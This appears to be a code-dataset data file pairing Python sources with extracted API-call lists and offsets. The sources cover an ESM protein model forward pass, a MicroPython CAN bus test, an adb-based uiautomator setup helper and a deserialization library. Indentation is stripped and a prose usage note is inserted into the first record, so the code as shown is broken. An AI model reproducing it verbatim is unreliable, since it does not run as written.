padding_mask = tokens.eq(self.padding_idx) # B, T
x = self.embed_scale * self.embed_tokens(tokens)
if getattr(self.args, 'token_dropout', False):
x.masked_fill_((tokens == self.mask_idx).unsqueeze(-1), 0.0)
# x: B x T x C
mask_ratio_train = 0.15 * 0.8
src_lengths = (~padding_mask).sum(-1)
mask_ratio_observed = (tokens == self.mask_idx).sum(-1).float() / src_lengths
x = x * (1 - mask_ratio_train) / (1 - mask_ratio_observed)[:, None, None]
x = x + self.embed_positions(tokens)
if self.model_version == 'ESM-1b':
x = self.emb_layer_norm_before(x)
if padding_mask is not None:
x = x * (1 - padding_mask.unsqueeze(-1).type_as(x))
repr_layers = set(repr_layers)
hidden_representations = {}
if 0 in repr_layers:
hidden_representations[0] = x
if need_head_weights:
attn_weights = []
# (B, T, E) => (T, B, E)
x = x.transpose(0, 1)
if not padding_mask.any():
padding_mask = None
for layer_idx, layer in enumerate(self.layers):
x, attn = layer(x, self_attn_padding_mask=padding_mask, need_head_weights=need_head_weights)
if (layer_idx + 1) in repr_layers:
hidden_representations[layer_idx + 1] = x.transpose(0, 1)
if need_head_weights:
# (H, B, T, T) => (B, H, T, T)
attn_weights.append(attn.transpose(1, 0))
if self.model_version == 'ESM-1b':
x = self.emb_layer_norm_after(x)
x = x.transpose(0, 1) # (T, B, E) => (B, T, E)
# last hidden representation should have layer norm applied
if (layer_idx + 1) in repr_layers:
hidden_representations[layer_idx + 1] = x
x = self.lm_head(x)
else:
x = F.linear(x, self.embed_out, bias=self.embed_out_bias)
x = x.transpose(0, 1) # (T, B, E) => (B, T, E)
result = {"logits": x, "representations": hidden_representations}
if need_head_weights:
# attentions: B x L x H x T x T
attentions = torch.stack(attn_weights, 1)
if self.model_version == "ESM-1":
# ESM-1 models have an additional null-token for attention, which we remove
attentions = attentions[..., :-1]
if padding_mask is not None:
attention_mask = (1 - padding_mask.type_as(attentions))
attention_mask = attention_mask.unsqueeze(1) * attention_mask.unsqueeze(2)
attentions = attentions * attention_mask[:, None, None, :, :]
result["attentions"] = attentions
if return_contacts:
contacts = self._predict_contacts_from_token_attentions(tokens, attentions)
result["contacts"] = contacts
return result
def _predict_contacts_from_token_attentions(self, tokens, attentions):
# remove eos token attentions
if tokens[:, -1].eq(self.eos_idx).any():
eos_mask = tokens.ne(self.eos_idx).to(attentions)
eos_mask = eos_mask.unsqueeze(1) * eos_mask.unsqueeze(2)
attentions = attentions * eos_mask[:, None, None, :, :]
attentions = attentions[..., :-1, :-1]
# remove cls token attentions
if tokens[:, 0].eq(self.cls_idx).all():
attentions = attentions[..., 1:, 1:]
batch_size, layers, heads, seqlen, _ = attentions.size()
attentions = attentions.view(batch_size, layers * heads, seqlen, seqlen)
return self.contact_head(attentions)
def predict_contacts(self, tokens):
return self(tokens, return_contacts=True)["contacts"]
@property
def num_layers(self):
return self.args.layers
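A brief, hypothetical call pattern for the forward pass defined above, assuming `model` is an already-constructed ProteinBertModel and `tokens` is a LongTensor of token indices shaped (batch, seq_len):

result = model(tokens, repr_layers=[model.num_layers], return_contacts=True)
logits = result["logits"]                                  # (B, T, alphabet_size)
embeddings = result["representations"][model.num_layers]  # final-layer hidden states, (B, T, E)
attentions = result["attentions"]                          # (B, layers, heads, T, T)
contacts = result["contacts"]                              # predicted residue-residue contact probabilities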
| [
"torch.nn.functional.linear",
"torch.stack",
"math.sqrt",
"torch.zeros",
"torch.nn.Embedding"
] | [((1887, 1975), 'torch.nn.Embedding', 'nn.Embedding', (['self.alphabet_size', 'self.args.embed_dim'], {'padding_idx': 'self.padding_idx'}), '(self.alphabet_size, self.args.embed_dim, padding_idx=self.\n padding_idx)\n', (1899, 1975), True, 'import torch.nn as nn\n'), ((3156, 3186), 'math.sqrt', 'math.sqrt', (['self.args.embed_dim'], {}), '(self.args.embed_dim)\n', (3165, 3186), False, 'import math\n'), ((3338, 3392), 'torch.zeros', 'torch.zeros', (['(self.alphabet_size, self.args.embed_dim)'], {}), '((self.alphabet_size, self.args.embed_dim))\n', (3349, 3392), False, 'import torch\n'), ((5680, 5733), 'torch.nn.functional.linear', 'F.linear', (['x', 'self.embed_out'], {'bias': 'self.embed_out_bias'}), '(x, self.embed_out, bias=self.embed_out_bias)\n', (5688, 5733), True, 'import torch.nn.functional as F\n'), ((5967, 5995), 'torch.stack', 'torch.stack', (['attn_weights', '(1)'], {}), '(attn_weights, 1)\n', (5978, 5995), False, 'import torch\n'), ((3518, 3549), 'torch.zeros', 'torch.zeros', (['self.alphabet_size'], {}), '(self.alphabet_size)\n', (3529, 3549), False, 'import torch\n')] |
from pyb import CAN
CAN.initfilterbanks(14)
can = CAN(1)
print(can)
can.init(CAN.LOOPBACK)
print(can)
print(can.any(0))
# Catch all filter
can.setfilter(0, CAN.MASK16, 0, (0, 0, 0, 0))
can.send('abcd', 123)
print(can.any(0))
print(can.recv(0))
can.send('abcd', -1)
print(can.recv(0))
can.send('abcd', 0x7FF + 1)
print(can.recv(0))
# Test too long message
try:
can.send('abcdefghi', 0x7FF)
except ValueError:
print('passed')
else:
print('failed')
del can
# Testing extended IDs
can = CAN(1, CAN.LOOPBACK, extframe = True)
# Catch all filter
can.setfilter(0, CAN.MASK32, 0, (0, 0))
print(can)
try:
can.send('abcde', 0x7FF + 1)
except ValueError:
print('failed')
else:
r = can.recv(0)
if r[0] == 0x7FF+1 and r[3] == b'abcde':
print('passed')
else:
print('failed, wrong data received')
del can
# Test RxCallbacks
can = CAN(1, CAN.LOOPBACK)
can.setfilter(0, CAN.LIST16, 0, (1, 2, 3, 4))
can.setfilter(1, CAN.LIST16, 1, (5, 6, 7, 8))
def cb0(bus, reason):
print('cb0')
if reason == 0:
print('pending')
if reason == 1:
print('full')
if reason == 2:
print('overflow')
def cb1(bus, reason):
print('cb1')
if reason == 0:
print('pending')
if reason == 1:
print('full')
if reason == 2:
print('overflow')
def cb0a(bus, reason):
print('cb0a')
if reason == 0:
print('pending')
if reason == 1:
print('full')
if reason == 2:
print('overflow')
def cb1a(bus, reason):
print('cb1a')
if reason == 0:
print('pending')
if reason == 1:
print('full')
if reason == 2:
print('overflow')
can.rxcallback(0, cb0)
can.rxcallback(1, cb1)
can.send('11111111',1)
can.send('22222222',2)
can.send('33333333',3)
can.rxcallback(0, cb0a)
can.send('44444444',4)
can.send('55555555',5)
can.send('66666666',6)
can.send('77777777',7)
can.rxcallback(1, cb1a)
can.send('88888888',8)
print(can.recv(0))
print(can.recv(0))
print(can.recv(0))
print(can.recv(1))
print(can.recv(1))
print(can.recv(1))
can.send('11111111',1)
can.send('55555555',5)
print(can.recv(0))
print(can.recv(1))
| [
"pyb.CAN",
"pyb.CAN.initfilterbanks"
] | [((21, 44), 'pyb.CAN.initfilterbanks', 'CAN.initfilterbanks', (['(14)'], {}), '(14)\n', (40, 44), False, 'from pyb import CAN\n'), ((51, 57), 'pyb.CAN', 'CAN', (['(1)'], {}), '(1)\n', (54, 57), False, 'from pyb import CAN\n'), ((504, 539), 'pyb.CAN', 'CAN', (['(1)', 'CAN.LOOPBACK'], {'extframe': '(True)'}), '(1, CAN.LOOPBACK, extframe=True)\n', (507, 539), False, 'from pyb import CAN\n'), ((876, 896), 'pyb.CAN', 'CAN', (['(1)', 'CAN.LOOPBACK'], {}), '(1, CAN.LOOPBACK)\n', (879, 896), False, 'from pyb import CAN\n')] |
#-*- coding: UTF-8 -*-
"""
Tencent is pleased to support the open source community by making GAutomator available.
Copyright (C) 2016 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
"""
__author__ = 'minhuaxu <EMAIL>'
import time
import os
import logging
from libs.uiauto.uiautomator import AutomatorDevice
from wpyscripts.common.adb_process import AdbTool
logger=logging.getLogger("wetest")
_device_port=9008
_uiautomator_port = os.environ.get("UIAUTOMATOR_PORT","19008")
def _init_uiautomator():
"""
    Initialize the uiautomator stub on the device (push the jar via adb and start it)
:return:
"""
file_path = os.path.split(os.path.realpath(__file__))[0]
uiautomator_stub_path = os.path.abspath(
os.path.join(file_path, "..","third","libs","uiAutomator","uiautomator-stub.jar"))
adb=AdbTool()
print(adb.cmd_wait("push",uiautomator_stub_path,"/data/local/tmp"))
logger.debug("Start UIAutomator")
uiautomator_process=adb.cmd("shell","uiautomator","runtest","uiautomator-stub.jar","-c","com.github.uiautomatorstub.Stub")
time.sleep(3)
logger.debug("Exit uiautomator")
adb.forward(_uiautomator_port,_device_port)
def _init():
port = os.environ.get("UIAUTOMATORPORT")
if port:
return int(port)
else:
"""
        Local run: initialize UiAutomator ourselves
"""
_init_uiautomator()
return int(_uiautomator_port)
def get_uiautomator():
if get_uiautomator.instance:
return get_uiautomator.instance
else:
port=_init()
get_uiautomator.instance = AutomatorDevice(None, port, os.environ.get("PLATFORM_IP", "127.0.0.1"), None)
return get_uiautomator.instance
get_uiautomator.instance=None
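Usage sketch: `get_uiautomator()` lazily runs the adb setup above and caches one AutomatorDevice. The `.info` read below is an assumption about the bundled uiautomator binding, not something defined in this module:

device = get_uiautomator()   # first call pushes the stub jar, starts it, and forwards the port
print(device.info)           # assumed AutomatorDevice attribute from the uiautomator binding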
| [
"logging.getLogger",
"os.path.join",
"os.environ.get",
"time.sleep",
"os.path.realpath",
"wpyscripts.common.adb_process.AdbTool"
] | [((870, 897), 'logging.getLogger', 'logging.getLogger', (['"""wetest"""'], {}), "('wetest')\n", (887, 897), False, 'import logging\n'), ((937, 980), 'os.environ.get', 'os.environ.get', (['"""UIAUTOMATOR_PORT"""', '"""19008"""'], {}), "('UIAUTOMATOR_PORT', '19008')\n", (951, 980), False, 'import os\n'), ((1263, 1272), 'wpyscripts.common.adb_process.AdbTool', 'AdbTool', ([], {}), '()\n', (1270, 1272), False, 'from wpyscripts.common.adb_process import AdbTool\n'), ((1515, 1528), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (1525, 1528), False, 'import time\n'), ((1640, 1673), 'os.environ.get', 'os.environ.get', (['"""UIAUTOMATORPORT"""'], {}), "('UIAUTOMATORPORT')\n", (1654, 1673), False, 'import os\n'), ((1172, 1261), 'os.path.join', 'os.path.join', (['file_path', '""".."""', '"""third"""', '"""libs"""', '"""uiAutomator"""', '"""uiautomator-stub.jar"""'], {}), "(file_path, '..', 'third', 'libs', 'uiAutomator',\n 'uiautomator-stub.jar')\n", (1184, 1261), False, 'import os\n'), ((1088, 1114), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (1104, 1114), False, 'import os\n'), ((2034, 2076), 'os.environ.get', 'os.environ.get', (['"""PLATFORM_IP"""', '"""127.0.0.1"""'], {}), "('PLATFORM_IP', '127.0.0.1')\n", (2048, 2076), False, 'import os\n')] |
"""A module for deserializing data to Python objects."""
# pylint: disable=unidiomatic-typecheck
# pylint: disable=protected-access
# pylint: disable=too-many-branches
# pylint: disable=wildcard-import
import enum
import functools
import typing
from typing import Any, Callable, Dict, List, Optional, Union
from deserialize.conversions import camel_case, pascal_case
from deserialize.decorators import constructed, _call_constructed
from deserialize.decorators import default, _get_default, _has_default
from deserialize.decorators import (
downcast_field,
_get_downcast_field,
downcast_identifier,
_get_downcast_class,
allow_downcast_fallback,
_allows_downcast_fallback,
)
from deserialize.decorators import ignore, _should_ignore
from deserialize.decorators import key, _get_key
from deserialize.decorators import parser, _get_parser
from deserialize.decorators import auto_snake, _uses_auto_snake
from deserialize.decorators import allow_unhandled, _should_allow_unhandled
from deserialize.exceptions import (
DeserializeException,
InvalidBaseTypeException,
NoDefaultSpecifiedException,
UndefinedDowncastException,
UnhandledFieldException,
)
from deserialize.type_checks import *
class RawStorageMode(enum.Enum):
"""The storage mode for the raw data on each object.
If a store mode is set, the data will be stored in the attribute named:
`__deserialize_raw__`
"""
# Do not store the raw data at all
none = "none"
# Only store the data on the root node
root = "root"
# Store on all objects (WARNING: This can use a significant amount of memory)
all = "all"
def child_mode(self) -> "RawStorageMode":
"""Determine the mode for child parsing.
When we move to the next child iteration, we need to change mode
in some cases. For instance, if we only store the root node, then we
need to set all the children to not be stored.
:raises Exception: If we get an unexpected storage mode
:returns: The child raw storage mode
"""
if self == RawStorageMode.none:
return RawStorageMode.none
if self == RawStorageMode.root:
return RawStorageMode.none
if self == RawStorageMode.all:
return RawStorageMode.all
raise DeserializeException(f"Unexpected raw storage mode: {self}")
# pylint: disable=function-redefined
def deserialize(class_reference, data, *, throw_on_unhandled: bool = False, raw_storage_mode: RawStorageMode = RawStorageMode.none): # type: ignore
"""Deserialize data to a Python object."""
if not isinstance(data, dict) and not isinstance(data, list):
raise InvalidBaseTypeException(
"Only lists and dictionaries are supported as base raw data types"
)
if hasattr(class_reference, "__name__"):
name = class_reference.__name__
else:
name = str(class_reference)
return _deserialize(
class_reference,
data,
name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
# pylint: enable=function-redefined
# pylint:disable=too-many-return-statements
def _deserialize(
class_reference, data, debug_name, *, throw_on_unhandled: bool, raw_storage_mode: RawStorageMode
):
"""Deserialize data to a Python object, but allow base types"""
# In here we try and use some "heuristics" to deserialize. We have 2 main
# options to do this. For the first, we can take the expected type and try
# and deserialize the data to that and show any errors. The other option is
# to take the data, and try and determine the types and deserialize that
# way. We do a mix of both.
#
# For example, we check if we have an any type or None type first and return
# early, since we can't deserialize directly to those (since that doesn't
# make any sense). But then later, we can't go for a list directly to a
# type, so we have to go through each item in the data, and iterate.
#
# This produces quite a complex interweaving of operations. The general
# approach I've found to work is to try and do specific type checks first,
# then handle collection data, then any other types afterwards. That's not
# set in stone though.
def finalize(value: Optional[Any]) -> Optional[Any]:
"""Run through any finalization steps before returning the value."""
# Set raw data where applicable
if raw_storage_mode in [RawStorageMode.root, RawStorageMode.all]:
# We can't set attributes on primitive types
if hasattr(value, "__dict__"):
setattr(value, "__deserialize_raw__", data)
return value
if class_reference == Any:
return finalize(data)
# Check if it's None (since things like Union[int, Optional[str]] become
# Union[int, str, None] so we end up iterating against it)
if class_reference == type(None) and data is None:
return finalize(None)
if is_union(class_reference):
valid_types = union_types(class_reference, debug_name)
exceptions = []
for valid_type in valid_types:
try:
return finalize(
_deserialize(
valid_type,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
)
except DeserializeException as ex:
exceptions.append(str(ex))
exception_message = (
f"Cannot deserialize '{type(data)}' to '{class_reference}' for '{debug_name}' ->"
)
for exception in exceptions:
exception_lines = exception.split("\n")
sub_message = f"\n\t* {exception_lines[0]}"
for line in exception_lines[1:]:
sub_message += f"\n\t{line}"
exception_message += sub_message
raise DeserializeException(exception_message)
if isinstance(data, dict):
return finalize(
_deserialize_dict(
class_reference,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
)
if isinstance(data, list):
return finalize(
_deserialize_list(
class_reference,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
)
if not is_typing_type(class_reference) and issubclass(class_reference, enum.Enum):
try:
return finalize(class_reference(data))
# pylint:disable=bare-except
except:
enum_by_name = getattr(class_reference, str(data), None)
if enum_by_name:
return finalize(enum_by_name)
# pylint:enable=bare-except
# This will be handled at the end
pass
# If we still have a type from the typing module, we don't know how to
# handle it
if is_typing_type(class_reference):
# The data should not be None if we have a type that got here. Optionals
# are handled by unions above, so if we are here, it's a non-optional
# type and therefore should not be None.
if data is None:
raise DeserializeException(
f"No value for '{debug_name}'. Expected value of type '{class_reference}'"
)
raise DeserializeException(
f"Unsupported deserialization type: {class_reference} for {debug_name}"
)
# Whatever we have left now is either correct, or invalid
if isinstance(data, class_reference):
return finalize(data)
raise DeserializeException(
f"Cannot deserialize '{type(data)}' to '{class_reference}' for '{debug_name}'"
)
# pylint:enable=too-many-return-statements
def _deserialize_list(
class_reference,
list_data,
debug_name,
*,
throw_on_unhandled: bool,
raw_storage_mode: RawStorageMode,
):
if not isinstance(list_data, list):
raise DeserializeException(
f"Cannot deserialize '{type(list_data)}' as a list for {debug_name}."
)
if not is_list(class_reference):
raise DeserializeException(
f"Cannot deserialize a list to '{class_reference}' for {debug_name}"
)
list_content_type_value = list_content_type(class_reference, debug_name)
output = []
for index, item in enumerate(list_data):
deserialized = _deserialize(
list_content_type_value,
item,
f"{debug_name}[{index}]",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
output.append(deserialized)
return output
def _deserialize_dict(
class_reference, data, debug_name, *, throw_on_unhandled: bool, raw_storage_mode: RawStorageMode
):
"""Deserialize a dictionary to a Python object."""
# Check if we are doing a straightforward dictionary parse first, or if it
# has to be deserialized
remaining_properties = set(data.keys())
if not isinstance(data, dict):
raise DeserializeException(
f"Data was not dict for instance: {class_reference} for {debug_name}"
)
if is_dict(class_reference):
if class_reference is dict:
# If types of dictionary entries are not defined, do not deserialize
return data
key_type, value_type = dict_content_types(class_reference, debug_name)
result = {}
for dict_key, dict_value in data.items():
if key_type != Any and not isinstance(dict_key, key_type):
raise DeserializeException(
f"Could not deserialize key {dict_key} to type {key_type} for {debug_name}"
)
result[dict_key] = _deserialize(
value_type,
dict_value,
f"{debug_name}.{dict_key}",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
remaining_properties.remove(dict_key)
if throw_on_unhandled and len(remaining_properties) > 0:
raise UnhandledFieldException(
f"The following field was unhandled: {list(remaining_properties)[0]} for {debug_name}"
)
return result
# It wasn't a straight forward dictionary, so we are in deserialize mode
class_instance = None
class_reference_downcast_field = _get_downcast_field(class_reference)
if class_reference_downcast_field:
downcast_value = data[class_reference_downcast_field]
new_reference = _get_downcast_class(class_reference, downcast_value)
if new_reference is None:
if _allows_downcast_fallback(class_reference):
return _deserialize(
Dict[Any, Any],
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
raise UndefinedDowncastException(
f"Could not find subclass of {class_reference} with downcast identifier '{downcast_value}' for {debug_name}"
)
class_reference = new_reference
class_instance = class_reference.__new__(class_reference)
handled_fields = set()
hints = typing.get_type_hints(class_reference)
if len(hints) == 0:
raise DeserializeException(
f"Could not deserialize {data} into {class_reference} due to lack of type hints ({debug_name})"
)
for attribute_name, attribute_type in hints.items():
if _should_ignore(class_reference, attribute_name):
continue
property_key = _get_key(class_reference, attribute_name)
parser_function = _get_parser(class_reference, property_key)
if is_classvar(attribute_type):
if property_key in data:
raise DeserializeException(
f"ClassVars cannot be set: {debug_name}.{attribute_name}"
)
continue
if _uses_auto_snake(class_reference) and attribute_name.lower() != attribute_name:
raise DeserializeException(
f"When using auto_snake, all properties must be snake cased. Error on: {debug_name}.{attribute_name}"
)
using_default = False
if property_key in data:
value = data[property_key]
handled_fields.add(property_key)
property_value = parser_function(value)
elif _uses_auto_snake(class_reference) and camel_case(property_key) in data:
value = data[camel_case(property_key)]
handled_fields.add(camel_case(property_key))
property_value = parser_function(value)
elif _uses_auto_snake(class_reference) and pascal_case(property_key) in data:
value = data[pascal_case(property_key)]
handled_fields.add(pascal_case(property_key))
property_value = parser_function(value)
else:
if _has_default(class_reference, attribute_name):
deserialized_value = _get_default(class_reference, attribute_name)
using_default = True
else:
if not is_union(attribute_type) or type(None) not in union_types(
attribute_type, debug_name
):
raise DeserializeException(
f"Unexpected missing value for: {debug_name}.{attribute_name}"
)
property_value = parser_function(None)
if not using_default:
deserialized_value = _deserialize(
attribute_type,
property_value,
f"{debug_name}.{attribute_name}",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
setattr(class_instance, attribute_name, deserialized_value)
unhandled = set(data.keys()) - handled_fields
if throw_on_unhandled and len(unhandled) > 0:
filtered_unhandled = [
key for key in unhandled if not _should_allow_unhandled(class_reference, key)
]
if len(filtered_unhandled) > 0:
raise UnhandledFieldException(
f"Unhandled field: {list(filtered_unhandled)[0]} for {debug_name}"
)
_call_constructed(class_reference, class_instance)
return class_instance
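To make the entry point above concrete, a minimal sketch (the Point class and the data are hypothetical) of deserializing a dict and a list, plus the raw-storage option documented on RawStorageMode:

class Point:
    x: int
    y: int

point = deserialize(Point, {"x": 1, "y": 2})
assert point.x == 1 and point.y == 2

# List[...] base types are handled by _deserialize_list.
points = deserialize(List[Point], [{"x": 3, "y": 4}])

# With RawStorageMode.root the original dict is kept on the result object.
tracked = deserialize(Point, {"x": 5, "y": 6}, raw_storage_mode=RawStorageMode.root)
assert tracked.__deserialize_raw__ == {"x": 5, "y": 6}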
| [
"typing.get_type_hints",
"deserialize.decorators._get_downcast_field",
"deserialize.decorators._call_constructed",
"deserialize.decorators._has_default",
"deserialize.decorators._get_default",
"deserialize.decorators._should_ignore",
"deserialize.decorators._allows_downcast_fallback",
"deserialize.exceptions.UndefinedDowncastException",
"deserialize.decorators._uses_auto_snake",
"deserialize.decorators._should_allow_unhandled",
"deserialize.decorators._get_parser",
"deserialize.exceptions.InvalidBaseTypeException",
"deserialize.conversions.camel_case",
"deserialize.exceptions.DeserializeException",
"deserialize.decorators._get_key",
"deserialize.conversions.pascal_case",
"deserialize.decorators._get_downcast_class"
] | [((10847, 10883), 'deserialize.decorators._get_downcast_field', '_get_downcast_field', (['class_reference'], {}), '(class_reference)\n', (10866, 10883), False, 'from deserialize.decorators import downcast_field, _get_downcast_field, downcast_identifier, _get_downcast_class, allow_downcast_fallback, _allows_downcast_fallback\n'), ((11760, 11798), 'typing.get_type_hints', 'typing.get_type_hints', (['class_reference'], {}), '(class_reference)\n', (11781, 11798), False, 'import typing\n'), ((14835, 14885), 'deserialize.decorators._call_constructed', '_call_constructed', (['class_reference', 'class_instance'], {}), '(class_reference, class_instance)\n', (14852, 14885), False, 'from deserialize.decorators import constructed, _call_constructed\n'), ((2330, 2390), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""Unexpected raw storage mode: {self}"""'], {}), "(f'Unexpected raw storage mode: {self}')\n", (2350, 2390), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((2707, 2804), 'deserialize.exceptions.InvalidBaseTypeException', 'InvalidBaseTypeException', (['"""Only lists and dictionaries are supported as base raw data types"""'], {}), "(\n 'Only lists and dictionaries are supported as base raw data types')\n", (2731, 2804), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((6091, 6130), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['exception_message'], {}), '(exception_message)\n', (6111, 6130), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((7710, 7808), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""Unsupported deserialization type: {class_reference} for {debug_name}"""'], {}), "(\n f'Unsupported deserialization type: {class_reference} for {debug_name}')\n", (7730, 7808), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((8508, 8603), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""Cannot deserialize a list to \'{class_reference}\' for {debug_name}"""'], {}), '(\n f"Cannot deserialize a list to \'{class_reference}\' for {debug_name}")\n', (8528, 8603), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((9456, 9552), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""Data was not dict for instance: {class_reference} for {debug_name}"""'], {}), "(\n f'Data was not dict for instance: {class_reference} for {debug_name}')\n", (9476, 9552), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((11009, 11061), 'deserialize.decorators._get_downcast_class', '_get_downcast_class', (['class_reference', 'downcast_value'], {}), '(class_reference, downcast_value)\n', (11028, 11061), False, 'from deserialize.decorators import downcast_field, _get_downcast_field, downcast_identifier, _get_downcast_class, 
allow_downcast_fallback, _allows_downcast_fallback\n'), ((11838, 11965), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""Could not deserialize {data} into {class_reference} due to lack of type hints ({debug_name})"""'], {}), "(\n f'Could not deserialize {data} into {class_reference} due to lack of type hints ({debug_name})'\n )\n", (11858, 11965), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((12047, 12094), 'deserialize.decorators._should_ignore', '_should_ignore', (['class_reference', 'attribute_name'], {}), '(class_reference, attribute_name)\n', (12061, 12094), False, 'from deserialize.decorators import ignore, _should_ignore\n'), ((12141, 12182), 'deserialize.decorators._get_key', '_get_key', (['class_reference', 'attribute_name'], {}), '(class_reference, attribute_name)\n', (12149, 12182), False, 'from deserialize.decorators import key, _get_key\n'), ((12209, 12251), 'deserialize.decorators._get_parser', '_get_parser', (['class_reference', 'property_key'], {}), '(class_reference, property_key)\n', (12220, 12251), False, 'from deserialize.decorators import parser, _get_parser\n'), ((7568, 7669), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""No value for \'{debug_name}\'. Expected value of type \'{class_reference}\'"""'], {}), '(\n f"No value for \'{debug_name}\'. Expected value of type \'{class_reference}\'")\n', (7588, 7669), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((11111, 11153), 'deserialize.decorators._allows_downcast_fallback', '_allows_downcast_fallback', (['class_reference'], {}), '(class_reference)\n', (11136, 11153), False, 'from deserialize.decorators import downcast_field, _get_downcast_field, downcast_identifier, _get_downcast_class, allow_downcast_fallback, _allows_downcast_fallback\n'), ((11449, 11595), 'deserialize.exceptions.UndefinedDowncastException', 'UndefinedDowncastException', (['f"""Could not find subclass of {class_reference} with downcast identifier \'{downcast_value}\' for {debug_name}"""'], {}), '(\n f"Could not find subclass of {class_reference} with downcast identifier \'{downcast_value}\' for {debug_name}"\n )\n', (11475, 11595), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((12503, 12536), 'deserialize.decorators._uses_auto_snake', '_uses_auto_snake', (['class_reference'], {}), '(class_reference)\n', (12519, 12536), False, 'from deserialize.decorators import auto_snake, _uses_auto_snake\n'), ((12601, 12734), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""When using auto_snake, all properties must be snake cased. Error on: {debug_name}.{attribute_name}"""'], {}), "(\n f'When using auto_snake, all properties must be snake cased. 
Error on: {debug_name}.{attribute_name}'\n )\n", (12621, 12734), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((9989, 10096), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""Could not deserialize key {dict_key} to type {key_type} for {debug_name}"""'], {}), "(\n f'Could not deserialize key {dict_key} to type {key_type} for {debug_name}'\n )\n", (10009, 10096), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((12352, 12431), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""ClassVars cannot be set: {debug_name}.{attribute_name}"""'], {}), "(f'ClassVars cannot be set: {debug_name}.{attribute_name}')\n", (12372, 12431), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n'), ((12969, 13002), 'deserialize.decorators._uses_auto_snake', '_uses_auto_snake', (['class_reference'], {}), '(class_reference)\n', (12985, 13002), False, 'from deserialize.decorators import auto_snake, _uses_auto_snake\n'), ((13007, 13031), 'deserialize.conversions.camel_case', 'camel_case', (['property_key'], {}), '(property_key)\n', (13017, 13031), False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((13066, 13090), 'deserialize.conversions.camel_case', 'camel_case', (['property_key'], {}), '(property_key)\n', (13076, 13090), False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((13123, 13147), 'deserialize.conversions.camel_case', 'camel_case', (['property_key'], {}), '(property_key)\n', (13133, 13147), False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((13214, 13247), 'deserialize.decorators._uses_auto_snake', '_uses_auto_snake', (['class_reference'], {}), '(class_reference)\n', (13230, 13247), False, 'from deserialize.decorators import auto_snake, _uses_auto_snake\n'), ((13478, 13523), 'deserialize.decorators._has_default', '_has_default', (['class_reference', 'attribute_name'], {}), '(class_reference, attribute_name)\n', (13490, 13523), False, 'from deserialize.decorators import default, _get_default, _has_default\n'), ((14594, 14639), 'deserialize.decorators._should_allow_unhandled', '_should_allow_unhandled', (['class_reference', 'key'], {}), '(class_reference, key)\n', (14617, 14639), False, 'from deserialize.decorators import allow_unhandled, _should_allow_unhandled\n'), ((13252, 13277), 'deserialize.conversions.pascal_case', 'pascal_case', (['property_key'], {}), '(property_key)\n', (13263, 13277), False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((13312, 13337), 'deserialize.conversions.pascal_case', 'pascal_case', (['property_key'], {}), '(property_key)\n', (13323, 13337), False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((13370, 13395), 'deserialize.conversions.pascal_case', 